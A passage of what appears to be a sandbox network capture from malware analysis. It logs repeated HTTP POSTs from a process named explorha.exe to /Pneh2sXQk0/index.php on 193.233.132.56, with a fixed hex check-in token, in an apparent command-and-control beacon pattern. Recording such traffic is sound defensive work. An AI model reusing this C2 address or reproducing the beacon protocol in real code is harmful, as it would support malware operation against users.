                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:54.994165897 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49851 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:55.343691111 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:55.585202932 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:55.586237907 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:55.832709074 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49854 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:56.196598053 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:56.448996067 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:56.450054884 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:56.707727909 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 49856 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:57.069612026 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:57.318077087 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:57.318840981 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:57.571655989 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 49861 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:57.932446957 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:58.183828115 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:58.185154915 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:29:58.445507050 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 49862 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:29:58.801763058 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:29:59.046861887 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:29:59.048047066 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.296912909 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      49 | 192.168.2.5 | 49863 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.696800947 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.948745012 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:59.954314947 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:00.211832047 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      50 | 192.168.2.5 | 49864 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:00.577872992 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:00.832135916 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:00.846025944 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:01.101581097 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      51 | 192.168.2.5 | 49865 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:01.543850899 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:01.792764902 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:01.794197083 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:02.047658920 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      52 | 192.168.2.5 | 49866 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:02.421377897 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:02.672463894 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:30:02.673408985 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:02.928219080 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 49867 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:03.282568932 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:03.525332928 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:30:03.529757977 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:03.777225971 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
